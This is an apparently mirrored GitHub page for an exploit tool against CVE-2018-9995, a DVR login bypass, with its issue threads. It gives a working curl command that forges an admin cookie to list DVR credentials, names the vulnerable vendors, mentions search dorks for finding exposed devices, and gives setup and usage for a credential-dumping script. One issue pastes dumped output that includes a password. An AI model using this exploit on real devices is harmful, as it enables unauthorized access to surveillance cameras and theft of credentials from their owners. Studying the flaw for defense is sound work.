GithubHelp home page GithubHelp logo

cve-2018-9995_dvr_credentials's Introduction

[Tool] show DVR Credentiales

[*] Exploit Title:       "Gets DVR Credentials" 
[*] CVE:                 CVE-2018-9995
[*] CVSS Base Score v3:  7.3 / 10
[*] CVSS Vector String:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
[*] Date:                09/04/2018
[*] Exploit Author:      Fernandez Ezequiel ( twitter:@capitan_alfa )

DVR_wall

Exploit:

	$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

tested in DVR (banner/vendor ?):

Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus,  - Security. Never Compromise !! - 
Night OWL
DVR Login
HVR Login
MDVR Login

On the Wild:

DVR_dorks_0 DVR_dorks_2 DVR_dorks_1 DVR_dorks_3

Possible Banners frontend (web):

DVR_login_1 DVR_login_2 DVR_login_3 DVR_login_4 DVR_login_5 DVR_login_6 DVR_login_7 DVR_login_8 DVR_login_10

Indoor:

DVR_indoor_1 DVR_indoor_2 DVR_indoor_3 DVR_indoor_4 DVR_indoor_5 DVR_indoor_6 DVR_indoor_7

TOOL: "Show all DVR Credentials"

Quick start

usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt

help

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining Exposed credentials

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81

Pocs (Output) :

DVR_poc_4 DVR_poc_3 DVR_poc_2 DVR_poc_1

Blog:

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html

I see you... ! xd

cve-2018-9995_dvr_credentials's People

Contributors

ezelf avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

cve-2018-9995_dvr_credentials's Issues

Python Script

I tried running this on the latest version of Kali Linux and it returned with this error: "Traceback (most recent call last):
File "getDVR_Credentials.py", line 6, in
import tableprint as tp
ImportError: No module named tableprint"
How to fix?
Do I clone from https://github.com/nirum/tableprint

fix in demo

INFO:
[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81

FIX:
[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 --port 81

error

[+] Error: Expecting ',' delimiter: line 1 column 44 (char 43)
[>] json: <Response [200]>

@capitan_alfa

[+] Error: Expecting value: line 1 column 1 (char 0)
[>] json: <Response [404]>

software error or no account

i don't know

[+] Error: Expecting ',' delimiter: line 1 column 44 (char 43)
[>] json: <Response [200]>

                             i don't know ,help pls 

Please help

Invalid conversion specification
[+] {u'list': [{u'opt': 4294967295L, u'uid': u'admin', u'enmac': 0, u'rview': 4294967295L, u'pwd': u'cnv_953+', u'mac': u'00:00:00:00:00:00', u'playback': 4294967295L, u'role': 2, u'ptz': 4294967295L, u'backup': 4294967295L, u'view': 4294967295L}], u'result': 0}

Win10 Kali No Module

Traceback (most recent call last):
File "getDVR_Credentials.py", line 4, in
import requests
ImportError: No module named request

1

很社会了

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.